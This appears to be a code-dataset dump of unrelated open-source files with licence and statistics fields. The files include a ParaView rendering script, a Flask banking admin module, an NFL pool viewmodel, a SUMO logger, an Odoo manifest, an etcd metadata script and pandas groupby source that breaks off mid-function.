SetActiveSource(fort_63_nc_xmf) # start building the pipeline from the reader
Threshold2 = Threshold()
Threshold2.Scalars = ['POINTS', 'BathymetricDepth']
Threshold2.ThresholdRange = [-100.0, 0.0]
# use Casey's bathy/topo color bar
bathyColorBar_PVLookupTable = GetLookupTableForArray( "BathymetricDepth", 1, RGBPoints=[-20.0, 0.0, 0.250004, 0.0, -10.0, 0.0, 0.500008, 0.0, -5.0, 0.0, 0.629999, 0.0, -2.0, 0.0, 0.764996, 0.0, -1.0, 0.0, 0.8, 0.0500038, -0.5, 0.0, 0.850004, 0.100008, -0.2, 0.0, 0.900008, 0.149996, -0.1, 0.0, 0.949996, 0.2, 0.0, 0.0, 1.0, 1.0, 0.0001, 1.0, 1.0, 1.0, 0.1, 1.0, 1.0, 1.0, 0.2, 0.0, 1.0, 1.0, 0.5, 0.0, 0.500008, 1.0, 1.0, 0.0, 0.4, 1.0, 2.0, 0.0, 0.299992, 1.0, 5.0, 0.0, 0.2, 1.0, 10.0, 0.0, 0.100008, 1.0, 20.0, 0.0, 0.00999466, 1.0, 50.0, 0.0, 0.0, 1.0, 100.0, 0.0, 0.0, 0.510002], VectorMode='Magnitude', NanColor=[0.498039, 0.0, 0.0], ColorSpace='RGB', ScalarRangeInitialized=1.0 )
bathyColorBar_PiecewiseFunction = CreatePiecewiseFunction( Points=[-66.632401, 0.0, 0.5, 0.0, 0.0, 1.0, 0.5, 0.0] )
bathyColorBar_PVLookupTable.ScalarOpacityFunction = bathyColorBar_PiecewiseFunction
WarpByScalar2 = WarpByScalar()
WarpByScalar2.Scalars = ['POINTS', 'BathymetricDepth']
WarpByScalar2.ScaleFactor = -0.0002
DataRepresentation5 = Show()
DataRepresentation5.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation5.SelectionPointFieldDataArrayName = 'BathymetricDepth'
DataRepresentation5.ScalarOpacityFunction = bathyColorBar_PiecewiseFunction
DataRepresentation5.ColorArrayName = ('POINT_DATA', 'BathymetricDepth')
DataRepresentation5.ScalarOpacityUnitDistance = 0.11216901957450816
DataRepresentation5.LookupTable = bathyColorBar_PVLookupTable
DataRepresentation5.ScaleFactor = 1.2353294372558594
# T E X T A N N O T A T I O N
#Text1 = Text()
#Text1.Text = 'Hurricane Zack Exercise\nNHC Official Forecast Track\nAdvisory 8'
#DataRepresentation6 = Show()
RenderView1 = GetRenderView()
RenderView1.CameraClippingRange = [102.0, 105.0]
RenderView1.CameraFocalPoint = [-90.5, 29.5, 0.0]
RenderView1.CenterOfRotation = [-90.5, 29.5, 0.0]
RenderView1.CameraParallelScale = 1.6
RenderView1.InteractionMode = '2D'
RenderView1.CameraPosition = [-90.5, 29.5, 103.0]
RenderView1.CenterAxesVisibility = 0 # turn off axes that show center of rotation
#save screenshot
view = GetActiveView()
view.Background = [0.35,0.36,0.45] # dark gray
tsteps = fort_63_nc_xmf.TimestepValues
annTime = AnnotateTimeFilter(fort_63_nc_xmf)
# Show the filter
Show(annTime)
view.ViewTime = tsteps[int(options.frame)]
Render()
frame_file = 'test_%03d.png' % int(options.frame)
WriteImage(frame_file,Magnification=int(options.magnification))
#view.ViewTime = tsteps[100]
#Render()
#WriteImage("newtest3.png",Magnification=4)
# Save the animation to an avi file
#AnimateReader(fort_63_nc_xmf, filename="movie.avi")
|
gpl-3.0
| -6,397,047,685,143,120,000
| 53.661538
| 802
| 0.698987
| false
| 2.74575
| false
| false
| false
|
Pantynopants/DBMS_BANK
|
app/admin/views.py
|
1
|
6292
|
# -*- coding=utf-8 -*-
from flask import render_template, flash, redirect, url_for, request, make_response, current_app
from flask_login import login_required, current_user, login_user, logout_user
from forms import *
from ..models import *
from .. import db
from ..utils import db_utils
from . import admin
@admin.route('/')
def index():
# print("1")
return render_template('admin/index.html')
@admin.route('/login', methods=['GET', 'POST'])
def login():
"""
if cookie exists, log in without form
else give an random one
"""
form = LoginForm()
if form.validate_on_submit():
# print(form.username.data)
user = User.User.get_user_by_username(form.username.data)
if user is not None and user.verify_password(form.password.data):
login_user(user)
return redirect(request.args.get('next') or url_for('admin.index'))
else:
flash(u'user do not exist')
# print user, form.password.data
flash(u'log in faild')
return render_template('admin/login.html', form=form)
@admin.route('/register', methods=['GET', 'POST'])
def register():
# register_key = 'zhucema'
form = RegistrationForm()
if form.validate_on_submit() and not User.User.isUserExist(form.username.data):
# if form.registerkey.data != register_key:
# flash(u'注册码不符,请返回重试.')
# return redirect(url_for('admin.register'))
# else:
if form.password.data != form.password2.data:
flash(u'两次输入密码不一')
return redirect(url_for('admin.register'))
else:
user = User.User()
user.username=form.username.data
user.real_name=form.real_name.data
user.password=form.password.data
db_utils.commit_data(db, user)
# print(user.username)
flash(u'您已经注册成功')
return redirect(url_for('admin.login'))
return render_template('admin/register.html', form=form)
@admin.route('/logout')
@login_required
def logout():
logout_user()
flash(u'您已经登出了系统')
redirect_to_index = redirect(url_for('main.index'))
response = current_app.make_response(redirect_to_index )
response.set_cookie('USERID',value="GUEST")
return response
@admin.route('/transaction', methods=['GET', 'POST'])
@login_required
def transaction_modify():
user = db.session.query(User.User).filter(User.User.id == current_user.get_id()).first()
# print(a)
if user:
wallet = user.wallet
trans_instance = user.transaction
alist = user.transaction
# print(user.username)
# print(alist)
else:
flash("ERROR: can not find user")
redirect(url_for('admin.index'))
form = PostTransactionForm()
if form.validate_on_submit():
if form.payment.data != None :
if form.payment.data == 'wallet':
if form.wallet.data != None and form.wallet.data != 0:
user.pay_trans(trans=trans_instance, number = form.wallet.data)
# else:
# flash(u'nothing in wallet! use bank card instead!')
# redirect(url_for('admin.transaction'))
elif form.payment.data == 'bank_card':
if form.bank_card.data != None and form.bank_card.data != 0:
user.pay_trans(trans=trans_instance, number = form.bank_card.data)
db.session.commit()
flash(u'pay successful')
return redirect(url_for('admin.index'))
return render_template('admin/pay.html', form=form, list=alist)
@admin.route('/transaction/del', methods=['GET', 'POST'])
@login_required
def transaction_refund():
user = db.session.query(User.User).filter(User.User.id == current_user.get_id()).first()
# print(a)
if user:
wallet = user.wallet
# trans_instance = user.transaction
bill_list = user.bank_bill_item
# print(user.username)
# print(alist)
else:
flash("ERROR: can not find user")
return redirect(url_for('admin.index'))
form = PostTransactionReFundForm()
if form.validate_on_submit():
if form.serial_number.data != None:
flag = user.refund_trans(serial_number=int(form.serial_number.data))
else:
flash(u'choose one serial_number first')
return redirect(url_for('admin.index'))
db.session.commit()
if flag:
flash(u'refund successful')
# return redirect(url_for('admin.transaction_refund'))
return render_template('admin/refund.html', form=form, list=bill_list)
@admin.route('/check', methods=['GET', 'POST'])
@login_required
def check():
cost = BankBill.BankBillItem.get_total_money_in_date()
num = BankBill.BankBillItem.get_total_trans_number_in_date()
date = BankBill.BankBillItem.get_date()
bill_list = db.session.query(BankBill.BankBillItem).all()
return render_template('admin/check.html', cost = cost, number = num, data = date, list=bill_list)
# @admin.route('/category', methods=['GET', 'POST'])
# def category():
# clist = Category.query.all()
# form = PostCategoryForm()
# if form.validate_on_submit():
# category = Category(name=form.name.data)
# db.session.add(category)
# flash(u'分类添加成功')
# return redirect(url_for('admin.index'))
# return render_template('admin/category.html', form=form, list=clist)
# @admin.route('/category/del', methods=['GET'])
# @login_required
# def category_del():
# if request.args.get('id') is not None and request.args.get('a') == 'del':
# x = Category.query.filter_by(id=request.args.get('id')).first()
# if x is not None:
# db.session.delete(x)
# db.session.commit()
# flash(u'已经删除' + x.name)
# return redirect(url_for('admin.category'))
# flash(u'请检查输入')
# return redirect(url_for('admin.category'))
|
gpl-3.0
| -3,674,240,570,483,265,000
| 33.609195
| 102
| 0.591026
| false
| 3.498588
| false
| false
| false
|
prcutler/nflpool
|
nflpool/viewmodels/playerpicks_viewmodel.py
|
1
|
4310
|
from nflpool.viewmodels.viewmodelbase import ViewModelBase
class PlayerPicksViewModel(ViewModelBase):
def __init__(self):
self.afc_east_winner_pick = None
self.afc_east_second = None
self.afc_east_last = None
self.afc_north_winner_pick = None
self.afc_north_second = None
self.afc_north_last = None
self.afc_south_winner_pick = None
self.afc_south_second = None
self.afc_south_last = None
self.afc_west_winner_pick = None
self.afc_west_second = None
self.afc_west_last = None
self.nfc_east_winner_pick = None
self.nfc_east_second = None
self.nfc_east_last = None
self.nfc_north_winner_pick = None
self.nfc_north_second = None
self.nfc_north_last = None
self.nfc_south_winner_pick = None
self.nfc_south_second = None
self.nfc_south_last = None
self.nfc_west_winner_pick = None
self.nfc_west_second = None
self.nfc_west_last = None
self.afc_qb_pick = None
self.nfc_qb_pick = None
self.afc_rb_pick = None
self.nfc_rb_pick = None
self.afc_rec_pick = None
self.nfc_rec_pick = None
self.afc_sacks_pick = None
self.nfc_sacks_pick = None
self.afc_int_pick = None
self.nfc_int_pick = None
self.afc_wildcard1_pick = None
self.afc_wildcard2_pick = None
self.nfc_wildcard1_pick = None
self.nfc_wildcard2_pick = None
self.afc_pf_pick = None
self.nfc_pf_pick = None
self.specialteams_td_pick = None
def from_dict(self, data_dict):
self.afc_east_winner_pick = data_dict.get("afc_east_winner_pick")
self.afc_east_second = data_dict.get("afc_east_second")
self.afc_east_last = data_dict.get("afc_east_last")
self.afc_north_winner_pick = data_dict.get("afc_north_winner_pick")
self.afc_north_second = data_dict.get("afc_north_second")
self.afc_north_last = data_dict.get("afc_north_last")
self.afc_south_winner_pick = data_dict.get("afc_south_winner_pick")
self.afc_south_second = data_dict.get("afc_south_second")
self.afc_south_last = data_dict.get("afc_south_last")
self.afc_west_winner_pick = data_dict.get("afc_west_winner_pick")
self.afc_west_second = data_dict.get("afc_west_second")
self.afc_west_last = data_dict.get("afc_west_last")
self.nfc_east_winner_pick = data_dict.get("nfc_east_winner_pick")
self.nfc_east_second = data_dict.get("nfc_east_second")
self.nfc_east_last = data_dict.get("nfc_east_last")
self.nfc_north_winner_pick = data_dict.get("nfc_north_winner_pick")
self.nfc_north_second = data_dict.get("nfc_north_second")
self.nfc_north_last = data_dict.get("nfc_north_last")
self.nfc_south_winner_pick = data_dict.get("nfc_south_winner_pick")
self.nfc_south_second = data_dict.get("nfc_south_second")
self.nfc_south_last = data_dict.get("nfc_south_last")
self.nfc_west_winner_pick = data_dict.get("nfc_west_winner_pick")
self.nfc_west_second = data_dict.get("nfc_west_second")
self.nfc_west_last = data_dict.get("nfc_west_last")
self.afc_qb_pick = data_dict.get("afc_qb_pick")
self.nfc_qb_pick = data_dict.get("nfc_qb_pick")
self.afc_rb_pick = data_dict.get("afc_rb_pick")
self.nfc_rb_pick = data_dict.get("nfc_rb_pick")
self.afc_rec_pick = data_dict.get("afc_rec_pick")
self.nfc_rec_pick = data_dict.get("nfc_rec_pick")
self.afc_sacks_pick = data_dict.get("afc_sacks_pick")
self.nfc_sacks_pick = data_dict.get("nfc_sacks_pick")
self.afc_int_pick = data_dict.get("afc_int_pick")
self.nfc_int_pick = data_dict.get("nfc_int_pick")
self.afc_wildcard1_pick = data_dict.get("afc_wildcard1_pick")
self.afc_wildcard2_pick = data_dict.get("afc_wildcard2_pick")
self.nfc_wildcard1_pick = data_dict.get("nfc_wildcard1_pick")
self.nfc_wildcard2_pick = data_dict.get("nfc_wildcard2_pick")
self.afc_pf_pick = data_dict.get("afc_pf_pick")
self.nfc_pf_pick = data_dict.get("nfc_pf_pick")
self.specialteams_td_pick = data_dict.get("specialteams_td_pick")
|
mit
| 2,485,024,036,205,383,700
| 47.426966
| 75
| 0.623666
| false
| 2.802341
| false
| false
| false
|
702nADOS/sumo
|
tools/contributed/sumopy/agilepy/lib_base/logger.py
|
1
|
1227
|
import types
class Logger:
def __init__(self, filepath=None, is_stdout=True):
self._filepath = filepath
self._logfile = None
self._callbacks = {}
self._is_stdout = is_stdout
def start(self, text=''):
if self._filepath != None:
self._logfile = open(self._filepath, 'w')
self._logfile.write(text + '\n')
else:
self._logfile = None
print text
def add_callback(self, function, key='message'):
self._callbacks[key] = function
def progress(self, percent):
pass
def w(self, data, key='message', **kwargs):
# print 'w:',data,self._callbacks
if self._logfile != None:
self._logfile.write(str(data) + '\n')
elif self._callbacks.has_key(key):
kwargs['key'] = key
self._callbacks[key](data, **kwargs)
# elif type(data)==types.StringType:
# print data
if self._is_stdout:
print str(data)
def stop(self, text=''):
if self._logfile != None:
self._logfile.write(text + '\n')
self._logfile.close()
self._logfile = None
else:
print text
|
gpl-3.0
| 895,495,032,246,819,500
| 26.266667
| 54
| 0.519152
| false
| 4.131313
| false
| false
| false
|
ayepezv/GAD_ERP
|
addons/hr_expense/__openerp__.py
|
2
|
1889
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': 'Expense Tracker',
'version': '2.0',
'category': 'Human Resources',
'sequence': 95,
'summary': 'Expenses Validation, Invoicing',
'description': """
Manage expenses by Employees
============================
This application allows you to manage your employees' daily expenses. It gives you access to your employees’ fee notes and give you the right to complete and validate or refuse the notes. After validation it creates an invoice for the employee.
Employee can encode their own expenses and the validation flow puts it automatically in the accounting after validation by managers.
The whole flow is implemented as:
---------------------------------
* Draft expense
* Submitted by the employee to his manager
* Approved by his manager
* Validation by the accountant and accounting entries creation
This module also uses analytic accounting and is compatible with the invoice on timesheet module so that you are able to automatically re-invoice your customers' expenses if your work by project.
""",
'website': 'https://www.odoo.com/page/expenses',
'depends': ['hr_contract', 'account_accountant', 'report', 'web_tour'],
'data': [
'security/ir.model.access.csv',
'data/hr_expense_data.xml',
'data/hr_expense_sequence.xml',
'wizard/hr_expense_refuse_reason.xml',
'wizard/hr_expense_register_payment.xml',
'views/hr_expense_views.xml',
'security/ir_rule.xml',
'report/report_expense_sheet.xml',
'views/hr_dashboard.xml',
'views/hr_expense.xml',
'views/tour_views.xml',
'views/res_config_views.xml',
'data/web_planner_data.xml',
],
'demo': ['data/hr_expense_demo.xml'],
'installable': True,
'application': True,
}
|
gpl-3.0
| -3,994,445,756,238,314,000
| 38.3125
| 244
| 0.661897
| false
| 3.914938
| false
| false
| false
|
meatballhat/ansible-inventory-hacks
|
ansible_inventory_hacks/etcd/touch.py
|
1
|
2242
|
#!/usr/bin/env python
# vim:fileencoding=utf-8
import argparse
import datetime
import os
import socket
import subprocess
import sys
import etcd
from . import DEFAULT_PREFIX
ETCD_KEY_TMPL = '{prefix}/{hostname}/{key}'
USAGE = """%(prog)s [options]
Splat some metadata into etcd!
"""
def main(sysargs=sys.argv[:]):
parser = argparse.ArgumentParser(
usage=USAGE, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'hostname', metavar='ANSIBLE_HOSTNAME',
default=os.getenv('ANSIBLE_HOSTNAME'),
help='hostname that is being touched')
parser.add_argument(
'-s', '--server', metavar='ETCD_SERVER',
default=os.getenv('ETCD_SERVER', '127.0.0.1'),
help='etcd server ip or hostname')
parser.add_argument(
'-p', '--prefix', metavar='ETCD_PREFIX',
default=os.getenv('ETCD_PREFIX', DEFAULT_PREFIX),
help='etcd key prefix')
parser.add_argument(
'-P', '--playbook', metavar='ANSIBLE_PLAYBOOK',
default=os.getenv('ANSIBLE_PLAYBOOK'),
help='the name of the playbook that is being run')
parser.add_argument(
'-T', '--team', metavar='TEAM',
default=os.environ.get('TEAM', 'UNKNOWN'),
help='the team name that will be included in the touch metadata')
args = parser.parse_args(sysargs[1:])
client = etcd.Client(host=args.server)
_set_metadata(client, args.playbook, args.hostname, args.team, args.prefix)
return 0
def _set_metadata(client, playbook, hostname, team, prefix):
for key, value in _etcd_metadata(playbook, hostname, team).iteritems():
etcd_key = ETCD_KEY_TMPL.format(
prefix=prefix, hostname=hostname, key=key)
client.set(etcd_key, value)
def _etcd_metadata(playbook, hostname, team):
return {
'playbook': playbook,
'hostname': hostname,
'local_user': os.getlogin(),
'local_host': socket.gethostname(),
'local_git_ref': _git_ref(),
'timestamp': datetime.datetime.utcnow().isoformat(),
'team': team,
}
def _git_ref():
return subprocess.check_output(['git', 'rev-parse', '-q', 'HEAD']).strip()
if __name__ == '__main__':
sys.exit(main())
|
mit
| -579,326,199,278,497,900
| 27.74359
| 79
| 0.630687
| false
| 3.645528
| false
| false
| false
|
datapythonista/pandas
|
pandas/core/groupby/generic.py
|
1
|
63278
|
"""
Define the SeriesGroupBy and DataFrameGroupBy
classes that hold the groupby interfaces (and some implementations).
These are user facing as the result of the ``df.groupby(...)`` operations,
which here returns a DataFrameGroupBy object.
"""
from __future__ import annotations
from collections import (
abc,
namedtuple,
)
from functools import partial
from textwrap import dedent
from typing import (
Any,
Callable,
Hashable,
Iterable,
Mapping,
TypeVar,
Union,
)
import warnings
import numpy as np
from pandas._libs import (
lib,
reduction as libreduction,
)
from pandas._typing import (
ArrayLike,
FrameOrSeries,
FrameOrSeriesUnion,
Manager2D,
)
from pandas.util._decorators import (
Appender,
Substitution,
doc,
)
from pandas.core.dtypes.common import (
ensure_int64,
is_bool,
is_categorical_dtype,
is_dict_like,
is_integer_dtype,
is_interval_dtype,
is_numeric_dtype,
is_scalar,
)
from pandas.core.dtypes.missing import (
isna,
notna,
)
from pandas.core import (
algorithms,
nanops,
)
from pandas.core.aggregation import (
maybe_mangle_lambdas,
reconstruct_func,
validate_func_kwargs,
)
from pandas.core.apply import GroupByApply
from pandas.core.base import (
DataError,
SpecificationError,
)
import pandas.core.common as com
from pandas.core.construction import create_series_with_explicit_dtype
from pandas.core.frame import DataFrame
from pandas.core.generic import NDFrame
from pandas.core.groupby import base
from pandas.core.groupby.groupby import (
GroupBy,
_agg_template,
_apply_docs,
_transform_template,
group_selection_context,
)
from pandas.core.indexes.api import (
Index,
MultiIndex,
all_indexes_same,
)
from pandas.core.series import Series
from pandas.core.util.numba_ import maybe_use_numba
from pandas.plotting import boxplot_frame_groupby
NamedAgg = namedtuple("NamedAgg", ["column", "aggfunc"])
# TODO(typing) the return value on this callable should be any *scalar*.
AggScalar = Union[str, Callable[..., Any]]
# TODO: validate types on ScalarResult and move to _typing
# Blocked from using by https://github.com/python/mypy/issues/1484
# See note at _mangle_lambda_list
ScalarResult = TypeVar("ScalarResult")
def generate_property(name: str, klass: type[FrameOrSeries]):
"""
Create a property for a GroupBy subclass to dispatch to DataFrame/Series.
Parameters
----------
name : str
klass : {DataFrame, Series}
Returns
-------
property
"""
def prop(self):
return self._make_wrapper(name)
parent_method = getattr(klass, name)
prop.__doc__ = parent_method.__doc__ or ""
prop.__name__ = name
return property(prop)
def pin_allowlisted_properties(klass: type[FrameOrSeries], allowlist: frozenset[str]):
"""
Create GroupBy member defs for DataFrame/Series names in a allowlist.
Parameters
----------
klass : DataFrame or Series class
class where members are defined.
allowlist : frozenset[str]
Set of names of klass methods to be constructed
Returns
-------
class decorator
Notes
-----
Since we don't want to override methods explicitly defined in the
base class, any such name is skipped.
"""
def pinner(cls):
for name in allowlist:
if hasattr(cls, name):
# don't override anything that was explicitly defined
# in the base class
continue
prop = generate_property(name, klass)
setattr(cls, name, prop)
return cls
return pinner
@pin_allowlisted_properties(Series, base.series_apply_allowlist)
class SeriesGroupBy(GroupBy[Series]):
_apply_allowlist = base.series_apply_allowlist
def _iterate_slices(self) -> Iterable[Series]:
yield self._selected_obj
_agg_examples_doc = dedent(
"""
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.groupby([1, 1, 2, 2]).min()
1 1
2 3
dtype: int64
>>> s.groupby([1, 1, 2, 2]).agg('min')
1 1
2 3
dtype: int64
>>> s.groupby([1, 1, 2, 2]).agg(['min', 'max'])
min max
1 1 2
2 3 4
The output column names can be controlled by passing
the desired column names and aggregations as keyword arguments.
>>> s.groupby([1, 1, 2, 2]).agg(
... minimum='min',
... maximum='max',
... )
minimum maximum
1 1 2
2 3 4
.. versionchanged:: 1.3.0
The resulting dtype will reflect the return value of the aggregating function.
>>> s.groupby([1, 1, 2, 2]).agg(lambda x: x.astype(float).min())
1 1.0
2 3.0
dtype: float64"""
)
@Appender(
_apply_docs["template"].format(
input="series", examples=_apply_docs["series_examples"]
)
)
def apply(self, func, *args, **kwargs):
return super().apply(func, *args, **kwargs)
@doc(_agg_template, examples=_agg_examples_doc, klass="Series")
def aggregate(self, func=None, *args, engine=None, engine_kwargs=None, **kwargs):
if maybe_use_numba(engine):
with group_selection_context(self):
data = self._selected_obj
result, index = self._aggregate_with_numba(
data.to_frame(), func, *args, engine_kwargs=engine_kwargs, **kwargs
)
return self.obj._constructor(result.ravel(), index=index, name=data.name)
relabeling = func is None
columns = None
if relabeling:
columns, func = validate_func_kwargs(kwargs)
kwargs = {}
if isinstance(func, str):
return getattr(self, func)(*args, **kwargs)
elif isinstance(func, abc.Iterable):
# Catch instances of lists / tuples
# but not the class list / tuple itself.
func = maybe_mangle_lambdas(func)
ret = self._aggregate_multiple_funcs(func)
if relabeling:
# error: Incompatible types in assignment (expression has type
# "Optional[List[str]]", variable has type "Index")
ret.columns = columns # type: ignore[assignment]
return ret
else:
cyfunc = com.get_cython_func(func)
if cyfunc and not args and not kwargs:
return getattr(self, cyfunc)()
if self.grouper.nkeys > 1:
return self._python_agg_general(func, *args, **kwargs)
try:
return self._python_agg_general(func, *args, **kwargs)
except KeyError:
# TODO: KeyError is raised in _python_agg_general,
# see test_groupby.test_basic
result = self._aggregate_named(func, *args, **kwargs)
index = Index(sorted(result), name=self.grouper.names[0])
return create_series_with_explicit_dtype(
result, index=index, dtype_if_empty=object
)
agg = aggregate
def _aggregate_multiple_funcs(self, arg) -> DataFrame:
if isinstance(arg, dict):
# show the deprecation, but only if we
# have not shown a higher level one
# GH 15931
raise SpecificationError("nested renamer is not supported")
elif any(isinstance(x, (tuple, list)) for x in arg):
arg = [(x, x) if not isinstance(x, (tuple, list)) else x for x in arg]
# indicated column order
columns = next(zip(*arg))
else:
# list of functions / function names
columns = []
for f in arg:
columns.append(com.get_callable_name(f) or f)
arg = zip(columns, arg)
results: dict[base.OutputKey, FrameOrSeriesUnion] = {}
for idx, (name, func) in enumerate(arg):
key = base.OutputKey(label=name, position=idx)
results[key] = self.aggregate(func)
if any(isinstance(x, DataFrame) for x in results.values()):
from pandas import concat
res_df = concat(
results.values(), axis=1, keys=[key.label for key in results.keys()]
)
# error: Incompatible return value type (got "Union[DataFrame, Series]",
# expected "DataFrame")
return res_df # type: ignore[return-value]
indexed_output = {key.position: val for key, val in results.items()}
output = self.obj._constructor_expanddim(indexed_output, index=None)
output.columns = Index(key.label for key in results)
output = self._reindex_output(output)
return output
def _cython_agg_general(
self, how: str, alt: Callable, numeric_only: bool, min_count: int = -1
):
obj = self._selected_obj
objvals = obj._values
data = obj._mgr
if numeric_only and not is_numeric_dtype(obj.dtype):
# GH#41291 match Series behavior
raise NotImplementedError(
f"{type(self).__name__}.{how} does not implement numeric_only."
)
# This is overkill because it is only called once, but is here to
# mirror the array_func used in DataFrameGroupBy._cython_agg_general
def array_func(values: ArrayLike) -> ArrayLike:
try:
result = self.grouper._cython_operation(
"aggregate", values, how, axis=data.ndim - 1, min_count=min_count
)
except NotImplementedError:
# generally if we have numeric_only=False
# and non-applicable functions
# try to python agg
# TODO: shouldn't min_count matter?
result = self._agg_py_fallback(values, ndim=data.ndim, alt=alt)
return result
result = array_func(objvals)
ser = self.obj._constructor(
result, index=self.grouper.result_index, name=obj.name
)
return self._reindex_output(ser)
def _wrap_aggregated_output(
self,
output: Mapping[base.OutputKey, Series | ArrayLike],
) -> Series:
"""
Wraps the output of a SeriesGroupBy aggregation into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, ArrayLike]]
Data to wrap.
Returns
-------
Series
Notes
-----
In the vast majority of cases output will only contain one element.
The exception is operations that expand dimensions, like ohlc.
"""
assert len(output) == 1
name = self.obj.name
index = self.grouper.result_index
values = next(iter(output.values()))
result = self.obj._constructor(values, index=index, name=name)
return self._reindex_output(result)
def _wrap_transformed_output(
self, output: Mapping[base.OutputKey, Series | ArrayLike]
) -> Series:
"""
Wraps the output of a SeriesGroupBy aggregation into the expected result.
Parameters
----------
output : dict[base.OutputKey, Union[Series, np.ndarray, ExtensionArray]]
Dict with a sole key of 0 and a value of the result values.
Returns
-------
Series
Notes
-----
output should always contain one element. It is specified as a dict
for consistency with DataFrame methods and _wrap_aggregated_output.
"""
assert len(output) == 1
name = self.obj.name
values = next(iter(output.values()))
result = self.obj._constructor(values, index=self.obj.index, name=name)
# No transformations increase the ndim of the result
assert isinstance(result, Series)
return result
def _wrap_applied_output(
self,
data: Series,
keys: Index,
values: list[Any] | None,
not_indexed_same: bool = False,
) -> FrameOrSeriesUnion:
"""
Wrap the output of SeriesGroupBy.apply into the expected result.
Parameters
----------
data : Series
Input data for groupby operation.
keys : Index
Keys of groups that Series was grouped by.
values : Optional[List[Any]]
Applied output for each group.
not_indexed_same : bool, default False
Whether the applied outputs are not indexed the same as the group axes.
Returns
-------
DataFrame or Series
"""
if len(keys) == 0:
# GH #6265
return self.obj._constructor(
[],
name=self.obj.name,
index=self.grouper.result_index,
dtype=data.dtype,
)
assert values is not None
def _get_index() -> Index:
if self.grouper.nkeys > 1:
index = MultiIndex.from_tuples(keys, names=self.grouper.names)
else:
index = Index(keys, name=self.grouper.names[0])
return index
if isinstance(values[0], dict):
# GH #823 #24880
index = _get_index()
res_df = self.obj._constructor_expanddim(values, index=index)
res_df = self._reindex_output(res_df)
# if self.observed is False,
# keep all-NaN rows created while re-indexing
res_ser = res_df.stack(dropna=self.observed)
res_ser.name = self.obj.name
return res_ser
elif isinstance(values[0], (Series, DataFrame)):
return self._concat_objects(keys, values, not_indexed_same=not_indexed_same)
else:
# GH #6265 #24880
result = self.obj._constructor(
data=values, index=_get_index(), name=self.obj.name
)
return self._reindex_output(result)
def _aggregate_named(self, func, *args, **kwargs):
# Note: this is very similar to _aggregate_series_pure_python,
# but that does not pin group.name
result = {}
initialized = False
for name, group in self:
# Each step of this loop corresponds to
# libreduction._BaseGrouper._apply_to_group
# NB: libreduction does not pin name
object.__setattr__(group, "name", name)
output = func(group, *args, **kwargs)
output = libreduction.extract_result(output)
if not initialized:
# We only do this validation on the first iteration
libreduction.check_result_array(output, group.dtype)
initialized = True
result[name] = output
return result
@Substitution(klass="Series")
@Appender(_transform_template)
def transform(self, func, *args, engine=None, engine_kwargs=None, **kwargs):
return self._transform(
func, *args, engine=engine, engine_kwargs=engine_kwargs, **kwargs
)
def _cython_transform(
self, how: str, numeric_only: bool = True, axis: int = 0, **kwargs
):
assert axis == 0 # handled by caller
obj = self._selected_obj
is_numeric = is_numeric_dtype(obj.dtype)
if numeric_only and not is_numeric:
raise DataError("No numeric types to aggregate")
try:
result = self.grouper._cython_operation(
"transform", obj._values, how, axis, **kwargs
)
except (NotImplementedError, TypeError):
raise DataError("No numeric types to aggregate")
return obj._constructor(result, index=self.obj.index, name=obj.name)
def _transform_general(self, func: Callable, *args, **kwargs) -> Series:
"""
Transform with a callable func`.
"""
assert callable(func)
klass = type(self.obj)
results = []
for name, group in self:
# this setattr is needed for test_transform_lambda_with_datetimetz
object.__setattr__(group, "name", name)
res = func(group, *args, **kwargs)
results.append(klass(res, index=group.index))
# check for empty "results" to avoid concat ValueError
if results:
from pandas.core.reshape.concat import concat
concatenated = concat(results)
result = self._set_result_index_ordered(concatenated)
else:
result = self.obj._constructor(dtype=np.float64)
result.name = self.obj.name
# error: Incompatible return value type (got "Union[DataFrame, Series]",
# expected "Series")
return result # type: ignore[return-value]
def _can_use_transform_fast(self, result) -> bool:
return True
def _wrap_transform_fast_result(self, result: Series) -> Series:
"""
fast version of transform, only applicable to
builtin/cythonizable functions
"""
ids, _, _ = self.grouper.group_info
result = result.reindex(self.grouper.result_index, copy=False)
out = algorithms.take_nd(result._values, ids)
return self.obj._constructor(out, index=self.obj.index, name=self.obj.name)
def filter(self, func, dropna: bool = True, *args, **kwargs):
"""
Return a copy of a Series excluding elements from groups that
do not satisfy the boolean criterion specified by func.
Parameters
----------
func : function
To apply to each group. Should return True or False.
dropna : Drop groups that do not pass the filter. True by default;
if False, groups that evaluate False are filled with NaNs.
Notes
-----
Functions that mutate the passed object can produce unexpected
behavior or errors and are not supported. See :ref:`gotchas.udf-mutation`
for more details.
Examples
--------
>>> df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
... 'foo', 'bar'],
... 'B' : [1, 2, 3, 4, 5, 6],
... 'C' : [2.0, 5., 8., 1., 2., 9.]})
>>> grouped = df.groupby('A')
>>> df.groupby('A').B.filter(lambda x: x.mean() > 3.)
1 2
3 4
5 6
Name: B, dtype: int64
Returns
-------
filtered : Series
"""
if isinstance(func, str):
wrapper = lambda x: getattr(x, func)(*args, **kwargs)
else:
wrapper = lambda x: func(x, *args, **kwargs)
# Interpret np.nan as False.
def true_and_notna(x) -> bool:
b = wrapper(x)
return b and notna(b)
try:
indices = [
self._get_index(name) for name, group in self if true_and_notna(group)
]
except (ValueError, TypeError) as err:
raise TypeError("the filter must return a boolean result") from err
filtered = self._apply_filter(indices, dropna)
return filtered
def nunique(self, dropna: bool = True) -> Series:
"""
Return number of unique elements in the group.
Returns
-------
Series
Number of unique values within each group.
"""
ids, _, _ = self.grouper.group_info
val = self.obj._values
codes, _ = algorithms.factorize(val, sort=False)
sorter = np.lexsort((codes, ids))
codes = codes[sorter]
ids = ids[sorter]
# group boundaries are where group ids change
# unique observations are where sorted values change
idx = np.r_[0, 1 + np.nonzero(ids[1:] != ids[:-1])[0]]
inc = np.r_[1, codes[1:] != codes[:-1]]
# 1st item of each group is a new unique observation
mask = codes == -1
if dropna:
inc[idx] = 1
inc[mask] = 0
else:
inc[mask & np.r_[False, mask[:-1]]] = 0
inc[idx] = 1
out = np.add.reduceat(inc, idx).astype("int64", copy=False)
if len(ids):
# NaN/NaT group exists if the head of ids is -1,
# so remove it from res and exclude its index from idx
if ids[0] == -1:
